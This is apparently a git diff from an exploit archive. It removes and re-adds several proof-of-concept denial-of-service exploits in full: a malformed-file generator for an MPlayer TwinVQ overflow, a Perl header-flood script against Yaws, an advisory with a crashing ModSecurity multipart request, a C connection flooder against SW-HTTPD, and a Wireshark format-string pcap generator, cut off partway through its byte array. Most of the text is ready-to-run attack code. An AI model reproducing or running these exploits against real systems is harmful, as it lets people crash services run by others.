-#
-#(8ec.748): Access violation - code c0000005 (first chance)
-#First chance exceptions are reported before any exception handling.
-#This exception may be expected and handled.
-#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
-#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
-#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
-#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
-#msvcrt!memcpy+0x33:
-#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
-#0:000> g
-#(8ec.748): Access violation - code c0000005 (!!! second chance !!!)
-#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
-#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
-#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200216
-#msvcrt!memcpy+0x33:
-#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
-###########################################################################################
-my $file="amir.vqf";
-open(my $FILE, ">$file") or die "Cannot open $file: $!";
-$head = "\x00\x01\xD4\xC0"; #SIZE
-$head2 = "\x43\x4f\x4d\x4d"; #COMM
-$head3 ="\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x60\x00\x00\x00\x2c".
- "\x00\x00\x00\x00\x4e\x41\x4d\x45\x00\x00\x00\x0b\x47\x69\x6c\x64".
- "\x65\x64\x20\x43\x61\x67\x65\x41\x55\x54\x48\x00\x00\x00\x11\x42".
- "\x6c\x61\x63\x6b\x6d\x6f\x72\x65\x91\x73\x20\x4e\x69\x67\x68\x74".
- "\x28\x63\x29\x20\x00\x00\x00\x04\x4a\x75\x72\x61\x41\x4c\x42\x4d".
- "\x00\x00\x00\x0d\x53\x65\x63\x72\x65\x74\x20\x56\x6f\x79\x61\x67".
- "\x65\x54\x52\x43\x4b\x00\x00\x00\x02\x30\x33\x44\x41\x54\x41\x0c"; # other headers. Not in mood to separate every one ;)
-
-print $FILE "TWIN97012000".$head.$head2.$head3. "A" x 120000; #don't pay attention to "A" repeat times.It's just a guess :p
-close($FILE);
-print "$file has been created \n";
-
-# milw0rm.com [2009-01-16]
+#!/usr/bin/perl
+# MPlayer 1.0rc2 TwinVQ Stack Buffer Overflow PoC
+# PoC by Amirreza Aminsalehi "sCORPINo"
+# (Proud To be an Abay)
+# scorpino x40 gmail x2e com
+# Snoop Security Researching Committee
+# www.snoop-security.com
+# Originaly this bug discovered by Tobias Klein
+# advisory @ http://trapkit.de/advisories/TKADV2008-014.txt
+# Tested on a windows xp sp2 english system and get SIG 11 after openning the PoC with MPlayer ;)
+# I did'nt find any document that explain VQF file format, So I reversed that file format to get the headers.
+# special tnX to: Shahriyar, Adel, Alireza, Yashar and all snoop members
+###########################################################################################
+# You Can See Debug dumps here:
+#
+#(8ec.748): Access violation - code c0000005 (first chance)
+#First chance exceptions are reported before any exception handling.
+#This exception may be expected and handled.
+#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
+#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
+#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210216
+#*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll -
+#msvcrt!memcpy+0x33:
+#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
+#0:000> g
+#(8ec.748): Access violation - code c0000005 (!!! second chance !!!)
+#eax=0c6257d4 ebx=001f4150 ecx=030fc9f5 edx=00000001 esi=00232fff edi=00215abc
+#eip=77c46fa3 esp=001f4120 ebp=001f4128 iopl=0 nv up ei pl nz ac pe nc
+#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200216
+#msvcrt!memcpy+0x33:
+#77c46fa3 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
+###########################################################################################
+my $file="amir.vqf";
+open(my $FILE, ">$file") or die "Cannot open $file: $!";
+$head = "\x00\x01\xD4\xC0"; #SIZE
+$head2 = "\x43\x4f\x4d\x4d"; #COMM
+$head3 ="\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x60\x00\x00\x00\x2c".
+ "\x00\x00\x00\x00\x4e\x41\x4d\x45\x00\x00\x00\x0b\x47\x69\x6c\x64".
+ "\x65\x64\x20\x43\x61\x67\x65\x41\x55\x54\x48\x00\x00\x00\x11\x42".
+ "\x6c\x61\x63\x6b\x6d\x6f\x72\x65\x91\x73\x20\x4e\x69\x67\x68\x74".
+ "\x28\x63\x29\x20\x00\x00\x00\x04\x4a\x75\x72\x61\x41\x4c\x42\x4d".
+ "\x00\x00\x00\x0d\x53\x65\x63\x72\x65\x74\x20\x56\x6f\x79\x61\x67".
+ "\x65\x54\x52\x43\x4b\x00\x00\x00\x02\x30\x33\x44\x41\x54\x41\x0c"; # other headers. Not in mood to separate every one ;)
+
+print $FILE "TWIN97012000".$head.$head2.$head3. "A" x 120000; #don't pay attention to "A" repeat times.It's just a guess :p
+close($FILE);
+print "$file has been created \n";
+
+# milw0rm.com [2009-01-16]
diff --git a/platforms/multiple/dos/8091.html b/platforms/multiple/dos/8091.html
index 0b661ab0d..7a0a1cf61 100755
--- a/platforms/multiple/dos/8091.html
+++ b/platforms/multiple/dos/8091.html
@@ -1,7 +1,7 @@
-
-
-# milw0rm.com [2009-02-23]
+
+
+# milw0rm.com [2009-02-23]
diff --git a/platforms/multiple/dos/8148.pl b/platforms/multiple/dos/8148.pl
index 3a9a70072..56475aa77 100755
--- a/platforms/multiple/dos/8148.pl
+++ b/platforms/multiple/dos/8148.pl
@@ -1,66 +1,66 @@
-#!usr/bin/perl -w
-
-#######################################################################################
-# Yaws before 1.80 allows remote attackers to cause a denial of service (memory
-# consumption and crash) via a request with a large number of headers.
-# Refer:
-# http://yaws.hyber.org/
-# http://www.securityfocus.com/bid/33834/discuss
-# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0751
-#
-#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
-#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
-#
-# Author: Praveen Dar$hanam
-# Email: praveen[underscore]recker[at]sify.com
-# Blog: http://www.darshanams.blogspot.com/
-# Date: 03rd March, 2009
-# Site: http://www.evilfingers.com/
-#
-###Thanx to str0ke, milw0rm, Manuel Duran Aguete, @rp m@n, and all the Security Folks###
-########################################################################################
-
-use IO::Socket;
-
-print("\nEnter IP Address of Yaws Server(not domain): \n");
-$vuln_host_ip = ;
-chomp($vuln_host_ip);
-$port = 80;
-
-$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,
- PeerPort => $port,
- Proto => 'tcp') || "Unable to create HTTP Socket";
-
-
-$headers="Date: Tue, 03 Mar 2009 15:17:53 GMT\r\n".
-"Accept-Ranges: bytes\r\n".
-"Content-Language: en\r\n".
-"Content-Type: text/html; charset=utf-8\r\n".
-"Expires: Thu, 05 Mar 2009 15:17:53 GMT\r\n".
-"Cache-Control: no-cache\r\n".
-"Content-Encoding: gzip\r\n".
-"Retry-After: 100\r\n";
-print "\nHeaders are:\n$headers";
-
-$i=0;
-while($i<=13) #this is just a PoC
-{
-$headers=$headers.$headers;
-$i++;
-}
-print "\nHeaders are:\n$headers";
-$yaws_attack = "GET / HTTP/1.1\r\n".
-"Host: $vuln_host_ip:$port\r\n".
-"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
-$headers.
-"Keep-Alive: 300\r\n".
-"Connection: keep-alive\r\n".
-"\r\n";
-sleep(3);
-print $sock_http $yaws_attack;
-sleep(2);
-print"\nRequest with large number of Headers sent...\n";
-
-close($sock_http);
-
-# milw0rm.com [2009-03-03]
+#!usr/bin/perl -w
+
+#######################################################################################
+# Yaws before 1.80 allows remote attackers to cause a denial of service (memory
+# consumption and crash) via a request with a large number of headers.
+# Refer:
+# http://yaws.hyber.org/
+# http://www.securityfocus.com/bid/33834/discuss
+# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0751
+#
+#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
+#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
+#
+# Author: Praveen Dar$hanam
+# Email: praveen[underscore]recker[at]sify.com
+# Blog: http://www.darshanams.blogspot.com/
+# Date: 03rd March, 2009
+# Site: http://www.evilfingers.com/
+#
+###Thanx to str0ke, milw0rm, Manuel Duran Aguete, @rp m@n, and all the Security Folks###
+########################################################################################
+
+use IO::Socket;
+
+print("\nEnter IP Address of Yaws Server(not domain): \n");
+$vuln_host_ip = ;
+chomp($vuln_host_ip);
+$port = 80;
+
+$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,
+ PeerPort => $port,
+ Proto => 'tcp') || "Unable to create HTTP Socket";
+
+
+$headers="Date: Tue, 03 Mar 2009 15:17:53 GMT\r\n".
+"Accept-Ranges: bytes\r\n".
+"Content-Language: en\r\n".
+"Content-Type: text/html; charset=utf-8\r\n".
+"Expires: Thu, 05 Mar 2009 15:17:53 GMT\r\n".
+"Cache-Control: no-cache\r\n".
+"Content-Encoding: gzip\r\n".
+"Retry-After: 100\r\n";
+print "\nHeaders are:\n$headers";
+
+$i=0;
+while($i<=13) #this is just a PoC
+{
+$headers=$headers.$headers;
+$i++;
+}
+print "\nHeaders are:\n$headers";
+$yaws_attack = "GET / HTTP/1.1\r\n".
+"Host: $vuln_host_ip:$port\r\n".
+"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
+$headers.
+"Keep-Alive: 300\r\n".
+"Connection: keep-alive\r\n".
+"\r\n";
+sleep(3);
+print $sock_http $yaws_attack;
+sleep(2);
+print"\nRequest with large number of Headers sent...\n";
+
+close($sock_http);
+
+# milw0rm.com [2009-03-03]
diff --git a/platforms/multiple/dos/8219.html b/platforms/multiple/dos/8219.html
index d955f4966..e99532326 100755
--- a/platforms/multiple/dos/8219.html
+++ b/platforms/multiple/dos/8219.html
@@ -1,10 +1,10 @@
-
-
-# milw0rm.com [2009-03-16]
+
+
+# milw0rm.com [2009-03-16]
diff --git a/platforms/multiple/dos/8241.txt b/platforms/multiple/dos/8241.txt
index ce042b6ea..f7fc289ce 100755
--- a/platforms/multiple/dos/8241.txt
+++ b/platforms/multiple/dos/8241.txt
@@ -1,127 +1,127 @@
-=============================================
-INTERNET SECURITY AUDITORS ALERT 2009-001
-- Original release date: February 25th, 2009
-- Last revised: March 19th, 2009
-- Discovered by: Juan Galiana Lara
-- Severity: 7.8/10 (CVSS Base Scored)
-=============================================
-
-I. VULNERABILITY
--------------------------
-ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS)
-
-II. BACKGROUND
--------------------------
-ModSecurity is the most widely-deployed web application firewall in
-the world, with more than 15,000 users. It runs as a Apache web server
-module and is developed by Breach Security [ http://www.breach.com ],
-it's avaliable with GNU GPL and many other comercial licenses.
-
-III. DESCRIPTION
--------------------------
-The multipart processor of modsecurity does not sanitize the user
-supplied input sufficiently. Therefore, an attacker can send a crafted
-post request of type multipart/form-data which will lead in a remote
-denial of service.
-
-The snippet of vulnerable code:
-
-in file msc_multipart.c
-
-1256 int multipart_get_arguments(modsec_rec *msr, char *origin,
-apr_table_t *arguments) {
-1257 multipart_part **parts;
-1258 int i;
-1259
-1260 parts = (multipart_part **)msr->mpd->parts->elts;
-1261 for(i = 0; i < msr->mpd->parts->nelts; i++) {
-1262 if (parts[i]->type == MULTIPART_FORMDATA) {
-1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp,
-sizeof(msc_arg));
-1264 if (arg == NULL) return -1;
-1265
-1266 arg->name = parts[i]->name;
-1267 arg->name_len = strlen(parts[i]->name);
-
-On line 1267, due to the pointer parts[i]->name is not properly
-sanitized the parameter of strlen function takes the value NULL,
-getting a segmentation fault and resulting in a crash of the apache
-process that handle the request.
-
-IV. PROOF OF CONCEPT
--------------------------
-The process could be crashed remotely by sending:
-
-POST / HTTP/1.0
-Content-Type: multipart/form-data;
-boundary=---------------------------xxxxxxxxxxxxxx
-Content-Length: 91
-
------------------------------xxxxxxxxxxxxxx
-:
------------------------------xxxxxxxxxxxxxx--
-
-In order to send a correct HTTP/1.1 request you must add a valid Host
-header.
-
-With the configuration directives:
-
- SecAuditEngine On
- SecDebugLogLevel 9
-
-After the attack, the last line of the debug logfile is:
-
-[25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9]
-Multipart: Added part abe458 to the list: name "(null)" (offset 0,
-length 0)
-
-V. BUSINESS IMPACT
--------------------------
-An attacker could cause a remote denial of service to an Apache
-installation with modsecurity 2 module.
-
-VI. SYSTEMS AFFECTED
--------------------------
-ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may
-be affected.
-
-Tested with Apache httpd 2.2.11.
-
-VII. SOLUTION
--------------------------
-Upgrade to version 2.5.9 of ModSecurity. It can be downloaded from
-http://modsecurity.org/download/
-
-VIII. REFERENCES
--------------------------
-http://www.modsecurity.org
-http://www.isecauditors.com
-
-IX. CREDITS
--------------------------
-This vulnerability has been discovered
-by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
-Thanks to Jordi Rubió Romero (jrubio (at) isecauditorts (dot) com).
-
-X. REVISION HISTORY
--------------------------
-February 25, 2009: Initial release
-March 19, 2009: Revision.
-
-XI. DISCLOSURE TIMELINE
--------------------------
-Febraury 25, 2009: Vulnerability acquired by
- Internet Security Auditors (www.isecauditors.com)
-March 02, 2009: ModSecurity contacted.
-March 02, 2009: Response about remediation plan.
-March 11, 2009: Path released
-March 19, 2009: Published.
-
-XII. LEGAL NOTICES
--------------------------
-The information contained within this advisory is supplied "as-is"
-with no warranties or guarantees of fitness of use or otherwise.
-Internet Security Auditors, S.L. accepts no responsibility for any
-damage caused by the use or misuse of this information.
-
-# milw0rm.com [2009-03-19]
+=============================================
+INTERNET SECURITY AUDITORS ALERT 2009-001
+- Original release date: February 25th, 2009
+- Last revised: March 19th, 2009
+- Discovered by: Juan Galiana Lara
+- Severity: 7.8/10 (CVSS Base Scored)
+=============================================
+
+I. VULNERABILITY
+-------------------------
+ModSecurity < 2.5.9 is vulnerable to a remote Denial of Service (DoS)
+
+II. BACKGROUND
+-------------------------
+ModSecurity is the most widely-deployed web application firewall in
+the world, with more than 15,000 users. It runs as a Apache web server
+module and is developed by Breach Security [ http://www.breach.com ],
+it's avaliable with GNU GPL and many other comercial licenses.
+
+III. DESCRIPTION
+-------------------------
+The multipart processor of modsecurity does not sanitize the user
+supplied input sufficiently. Therefore, an attacker can send a crafted
+post request of type multipart/form-data which will lead in a remote
+denial of service.
+
+The snippet of vulnerable code:
+
+in file msc_multipart.c
+
+1256 int multipart_get_arguments(modsec_rec *msr, char *origin,
+apr_table_t *arguments) {
+1257 multipart_part **parts;
+1258 int i;
+1259
+1260 parts = (multipart_part **)msr->mpd->parts->elts;
+1261 for(i = 0; i < msr->mpd->parts->nelts; i++) {
+1262 if (parts[i]->type == MULTIPART_FORMDATA) {
+1263 msc_arg *arg = (msc_arg *)apr_pcalloc(msr->mp,
+sizeof(msc_arg));
+1264 if (arg == NULL) return -1;
+1265
+1266 arg->name = parts[i]->name;
+1267 arg->name_len = strlen(parts[i]->name);
+
+On line 1267, due to the pointer parts[i]->name is not properly
+sanitized the parameter of strlen function takes the value NULL,
+getting a segmentation fault and resulting in a crash of the apache
+process that handle the request.
+
+IV. PROOF OF CONCEPT
+-------------------------
+The process could be crashed remotely by sending:
+
+POST / HTTP/1.0
+Content-Type: multipart/form-data;
+boundary=---------------------------xxxxxxxxxxxxxx
+Content-Length: 91
+
+-----------------------------xxxxxxxxxxxxxx
+:
+-----------------------------xxxxxxxxxxxxxx--
+
+In order to send a correct HTTP/1.1 request you must add a valid Host
+header.
+
+With the configuration directives:
+
+ SecAuditEngine On
+ SecDebugLogLevel 9
+
+After the attack, the last line of the debug logfile is:
+
+[25/Feb/2009:09:51:18 +0100] [vhost/sid#884348][rid#aaf0d8][/][9]
+Multipart: Added part abe458 to the list: name "(null)" (offset 0,
+length 0)
+
+V. BUSINESS IMPACT
+-------------------------
+An attacker could cause a remote denial of service to an Apache
+installation with modsecurity 2 module.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+ModSecurity between 2.5.5 and 2.5.8 are vulnerable, other versions may
+be affected.
+
+Tested with Apache httpd 2.2.11.
+
+VII. SOLUTION
+-------------------------
+Upgrade to version 2.5.9 of ModSecurity. It can be downloaded from
+http://modsecurity.org/download/
+
+VIII. REFERENCES
+-------------------------
+http://www.modsecurity.org
+http://www.isecauditors.com
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered
+by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
+Thanks to Jordi Rubió Romero (jrubio (at) isecauditorts (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+February 25, 2009: Initial release
+March 19, 2009: Revision.
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+Febraury 25, 2009: Vulnerability acquired by
+ Internet Security Auditors (www.isecauditors.com)
+March 02, 2009: ModSecurity contacted.
+March 02, 2009: Response about remediation plan.
+March 11, 2009: Path released
+March 19, 2009: Published.
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is"
+with no warranties or guarantees of fitness of use or otherwise.
+Internet Security Auditors, S.L. accepts no responsibility for any
+damage caused by the use or misuse of this information.
+
+# milw0rm.com [2009-03-19]
diff --git a/platforms/multiple/dos/8245.c b/platforms/multiple/dos/8245.c
index 081c7766d..b156dddb6 100755
--- a/platforms/multiple/dos/8245.c
+++ b/platforms/multiple/dos/8245.c
@@ -1,91 +1,91 @@ -/* -SW-HTTPD Server v0.x Denial of Service (PoC) - -Multiple Connections with GET /A[100] HTTP/1.1 -After server not found all pages. - -Author: Jonathan Salwan -Mail : submit [AT] shell-storm.org -Web : http://www.shell-storm.org -*/ - -#include "stdio.h" -#include "unistd.h" -#include "stdlib.h" -#include "sys/types.h" -#include "sys/socket.h" -#include "netinet/in.h" - -int syntax(char *file) - { - fprintf(stderr,"SW-HTTPD Server Denial of Service (PoC)\n"); - fprintf(stderr,"=>Syntax : <%s> \n\n",file); - exit(0); - } - -int main(int argc, char **argv) -{ - if (argc < 2) - syntax(argv[0]); - - int port = atoi(argv[2]); - - int mysocket; - int mysocket2; - int srv_connect; - int sockaddr_long; - - - char hexa[100] = "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" - "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"; - - struct sockaddr_in sockaddr_mysocket; - sockaddr_long = sizeof(sockaddr_mysocket); - sockaddr_mysocket.sin_family = AF_INET; - sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]); - sockaddr_mysocket.sin_port = htons(port); - - int i=0; - char request[118]; - - fprintf(stdout,"[+]SW-HTTPD Server %s\n",argv[1]); - -for(i=0;i<100000;i++){ - - mysocket2 = socket(AF_INET, SOCK_STREAM, 0); - if(mysocket2 == -1){ - fprintf(stdout,"[+]Done!\n"); - return 1;} - - srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long); - - if (srv_connect != -1) - { - sprintf(request, "GET /%s HTTP/1.1\r\n", hexa); - - if (send(mysocket2,request,sizeof(request),0) == -1){ - fprintf(stderr,"[-]Send Request\t\t[FAILED]\n"); - shutdown(mysocket2,1); - fprintf(stdout,"[+]Done!\n"); - 
return 1;} - } - else{ - fprintf(stderr,"[-]Connect\t\t[FAILED]\n"); - fprintf(stdout,"[+]Done!\n"); - shutdown(mysocket2,1); - return 1;} - - shutdown(mysocket2,1); -} -return 0; -} - -// milw0rm.com [2009-03-19] +/* +SW-HTTPD Server v0.x Denial of Service (PoC) + +Multiple Connections with GET /A[100] HTTP/1.1 +After server not found all pages. + +Author: Jonathan Salwan +Mail : submit [AT] shell-storm.org +Web : http://www.shell-storm.org +*/ + +#include "stdio.h" +#include "unistd.h" +#include "stdlib.h" +#include "sys/types.h" +#include "sys/socket.h" +#include "netinet/in.h" + +int syntax(char *file) + { + fprintf(stderr,"SW-HTTPD Server Denial of Service (PoC)\n"); + fprintf(stderr,"=>Syntax : <%s> \n\n",file); + exit(0); + } + +int main(int argc, char **argv) +{ + if (argc < 2) + syntax(argv[0]); + + int port = atoi(argv[2]); + + int mysocket; + int mysocket2; + int srv_connect; + int sockaddr_long; + + + char hexa[100] = "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30" + "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"; + + struct sockaddr_in sockaddr_mysocket; + sockaddr_long = sizeof(sockaddr_mysocket); + sockaddr_mysocket.sin_family = AF_INET; + sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]); + sockaddr_mysocket.sin_port = htons(port); + + int i=0; + char request[118]; + + fprintf(stdout,"[+]SW-HTTPD Server %s\n",argv[1]); + +for(i=0;i<100000;i++){ + + mysocket2 = socket(AF_INET, SOCK_STREAM, 0); + if(mysocket2 == -1){ + fprintf(stdout,"[+]Done!\n"); + return 1;} + + srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long); + + if (srv_connect != -1) + { + sprintf(request, 
"GET /%s HTTP/1.1\r\n", hexa); + + if (send(mysocket2,request,sizeof(request),0) == -1){ + fprintf(stderr,"[-]Send Request\t\t[FAILED]\n"); + shutdown(mysocket2,1); + fprintf(stdout,"[+]Done!\n"); + return 1;} + } + else{ + fprintf(stderr,"[-]Connect\t\t[FAILED]\n"); + fprintf(stdout,"[+]Done!\n"); + shutdown(mysocket2,1); + return 1;} + + shutdown(mysocket2,1); +} +return 0; +} + +// milw0rm.com [2009-03-19] diff --git a/platforms/multiple/dos/8308.c b/platforms/multiple/dos/8308.c index 9583353cb..a26b69d03 100755 --- a/platforms/multiple/dos/8308.c +++ b/platforms/multiple/dos/8308.c 
@@ -1,44 +1,44 @@
-/*
-################## THCX #######################################
-# Wireshark <= 1.0.6 PN-DCP format string bug POC
-###############################################################
-# [!] autore: THCX Labs
-# [!] PN-DCP eithor standalone or tunneld thru DCE/RPC
-# [!] local open of pcapfile also working
-###############################################################
-*/
-#include
-#include
-#include
-char sploit[]=
-"\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x01\x00\x00\x00"
-"\x96\x2c\x8f\x47\x97\xaa\x0d\x00\x22\x00\x00\x00\x22\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80"
-"\xc8\x38\xa4\x8b\x81\x00\x00\x00\x88\x92\xfe\xfe\x05\x00\x01\x00\x00\x01\x00\x01\x00\x04\xff\xff"
-"\x00\x00\x96\x2c\x8f\x47\x96\xae\x0d\x00\xd6\x00\x00\x00\xd6\x00\x00\x00\x00\x80\xc8\x38\xa4\x8b"
-"\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xff\x05\x01\x01\x00\x00\x01\x00\x00\x00\xb8"
-"\x02\x05\x00\x10\x00\x00\x02\x01\x02\x02\x02\x03\x02\x04\x02\x05\x01\x01\x01\x02\x02\x01\x00\x0a"
-"\x00\x00\x53\x37\x2d\x33\x30\x30\x45\x43\x02\x02\x00\x6e\x00\x00\x25\x6e\x25\x6e\x25\x6e\x20\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x02\x03\x00\x06\x00\x00\x00\x2a\x01\x01\x02\x04\x00\x04\x00\x00\x02\x00\x01\x02"
-"\x00\x0e\x00\x01\xc0\xa8\x00\x0b\xff\xff\xff\x00\xc0\xa8\x00\x0b\x97\x2c\x8f\x47\xf2\xd0\x0e\x00"
-"\x32\x00\x00\x00\x32\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80\xc8\x38\xa4\x8b\x81\x00\x00\x00"
-"\x88\x92\xfe\xfd\x04\x00\x01\x00\x00\x01\x00\x00\x00\x14\x02\x02\x00\x09\x00\x01\x25\x6e\x25\x6e"
-"\x25\x6e\x20\x00\x05\x02\x00\x02\x00\x00\x97\x2c\x8f\x47\x82\xd2\x0e\x00\x40\x00\x00\x00\x40\x00"
-"\x00\x00\x00\x80\xc8\x38\xa4\x8b\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xfd\x04\x01"
-"\x01\x00\x00\x01\x00\x00\x00\x10\x05\x04\x00\x03\x02\x02\x00\x00\x05\x04\x00\x03\x05\x02\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
-int main(){
-FILE *fh;
-int r;
-fh=fopen("formatstringbug.pcap","wb");
-if(!fh){perror("no open");exit(1);}
-fwrite(sploit,sizeof sploit,1,fh);
-fclose(fh);
-r=system("tcpreplay -i eth0 formatstringbug.pcap");
-return 0;
-}
-
-// milw0rm.com [2009-03-30]
+/*
+################## THCX #######################################
+# Wireshark <= 1.0.6 PN-DCP format string bug POC
+###############################################################
+# [!] autore: THCX Labs
+# [!] PN-DCP eithor standalone or tunneld thru DCE/RPC
+# [!] local open of pcapfile also working
+###############################################################
+*/
+#include
+#include
+#include
+char sploit[]=
+"\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x01\x00\x00\x00"
+"\x96\x2c\x8f\x47\x97\xaa\x0d\x00\x22\x00\x00\x00\x22\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80"
+"\xc8\x38\xa4\x8b\x81\x00\x00\x00\x88\x92\xfe\xfe\x05\x00\x01\x00\x00\x01\x00\x01\x00\x04\xff\xff"
+"\x00\x00\x96\x2c\x8f\x47\x96\xae\x0d\x00\xd6\x00\x00\x00\xd6\x00\x00\x00\x00\x80\xc8\x38\xa4\x8b"
+"\x00\x02\xe3\x17\xc7\x50\x81\x00\x00\x00\x88\x92\xfe\xff\x05\x01\x01\x00\x00\x01\x00\x00\x00\xb8"
+"\x02\x05\x00\x10\x00\x00\x02\x01\x02\x02\x02\x03\x02\x04\x02\x05\x01\x01\x01\x02\x02\x01\x00\x0a"
+"\x00\x00\x53\x37\x2d\x33\x30\x30\x45\x43\x02\x02\x00\x6e\x00\x00\x25\x6e\x25\x6e\x25\x6e\x20\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x02\x03\x00\x06\x00\x00\x00\x2a\x01\x01\x02\x04\x00\x04\x00\x00\x02\x00\x01\x02"
+"\x00\x0e\x00\x01\xc0\xa8\x00\x0b\xff\xff\xff\x00\xc0\xa8\x00\x0b\x97\x2c\x8f\x47\xf2\xd0\x0e\x00"
+"\x32\x00\x00\x00\x32\x00\x00\x00\x00\x02\xe3\x17\xc7\x50\x00\x80\xc8\x38\xa4\x8b\x81\x00\x00\x00"
+"\x88\x92\xfe\xfd\x04\x00\x01\x00\x00\x01\x00\x00\x00\x14\x02\x02\x00\x09\x00\x01\x25\x6e\x25\x6e"
+"\x25\x6e\x20\x00\x05\x02\x00\x02\x00\x00\x97\x2c\x8f\x47\x82\xd2\x0e\x00\x40\x00\x00\x00\x40\x00"
